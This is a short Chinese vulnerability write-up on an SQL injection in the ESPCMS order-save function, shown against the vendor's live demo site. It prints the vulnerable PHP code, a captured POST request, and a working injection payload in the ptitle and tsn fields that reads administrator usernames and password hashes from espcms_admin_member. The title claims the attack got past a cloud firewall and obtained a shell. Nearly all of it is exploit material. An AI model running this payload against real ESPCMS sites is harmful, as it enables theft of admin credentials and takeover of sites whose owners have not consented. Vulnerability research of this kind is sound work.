易思ESPCMS sql注入漏洞（绕过阿里云盾demo站成功拿下shell）

$db_values = '';    $arraycount = count($did) - 1;    foreach ($did as $key => $value) {     $value = intval($value);     $oprice[$key] = floatval($oprice[$key]);     $bprice[$key] = floatval($bprice[$key]);     $countprice[$key] = floatval($countprice[$key]);     $amount[$key] = intval($amount[$key]);     if ($key == $arraycount) {      $db_values.= "($insert_id,$value,'$tsn[$key]','$ptitle[$key]',$oprice[$key],$bprice[$key],$countprice[$key],$amount[$key],1)";     } else {      $db_values.= "($insert_id,$value,'$tsn[$key]','$ptitle[$key]',$oprice[$key],$bprice[$key],$countprice[$key],$amount[$key],1),";     }    }    $db_field = 'oid,did,tsn,title,oprice,bprice,countprice,amount,inventory';    $this->db->query('INSERT INTO ' . $db_table2 . ' (' . $db_field . ') VALUES ' . $db_values);

POST /index.php?ac=order&at=ordersave HTTP/1.1 Host: demo.ecisp.cn User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://demo.ecisp.cn/index.php?ac=order&at=orderpay Cookie: /**/ Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 426  userid=409&productmoney=33600&discount_productmoney=33600&discountmoney=0&tokenkey=98b9b2dbbda63c317b3f9ab9c370a47b&ptitle%5B%5D=ESPCMS%E5%BC%80%E5%8F%91%E7%89%88&tsn%5B%5D=SN20140706215345387&bprice%5B%5D=16800.00&oprice%5B%5D=16800.00&did%5B%5D=30&amount%5B%5D=2&countprice%5B%5D=33600.00&osid=1&opid=1&alias=wooyun&sex=0&email=asd%40qq.com&tel=123&mobile=123&address=test&zipcode=0&sendtime=1&content=&invpayee=&invcontent=

$ptitle = $this->fun->accept('ptitle', 'P'); $tsn = $this->fun->accept('tsn', 'P');

function accept($k, $var = 'R', $htmlcode = true, $rehtml = false) {   switch ($var) {    case 'G':     $var = &$_GET;     break;    case 'P':     $var = &$_POST;     break;

case 'C': $var = &$_COOKIE; break; case 'R': $var = &$_GET; if (empty($var[$k])) { $var = &$_POST; } break; } $putvalue = isset($var[$k]) ? $this->daddslashes($var[$k], 0) : NULL; return $htmlcode ? ($rehtml ? $this->preg_htmldecode($putvalue) : $this->htmldecode($putvalue)) : $putvalue; }

userid=1&productmoney=16800&discount_productmoney=16800&discountmoney=0&ptitle[]=,(SELECT CONCAT(USERNAME,0x2f,PASSWORD) FROM espcms_admin_member ),1,1,1,1,1)#&tsn='&bprice[]=16800.00&oprice[]=16800.00&did[]=30&amount[]=1&countprice[]=16800.00&osid=1&opid=1&alias=wooyun&sex=0&[email protected]&tel=10010&mobile=&address=china&zipcode=0&sendtime=1&content=&invpayee=&invcontent=

INSERT INTO espcms_order_info (oid,did,tsn,title,oprice,bprice,countprice,amount,inventory) VALUES (10,30,'/',',(SELECT CONCAT(USERNAME,0x2f,PASSWORD) FROM espcms_admin_member ),1,1,1,1,1)#',16800,16800,16800,1,1)

第一条 SELECT USERNAME FROM espcms_admin_member 第二条： SELECT PASSWORD FROM espcms_admin_member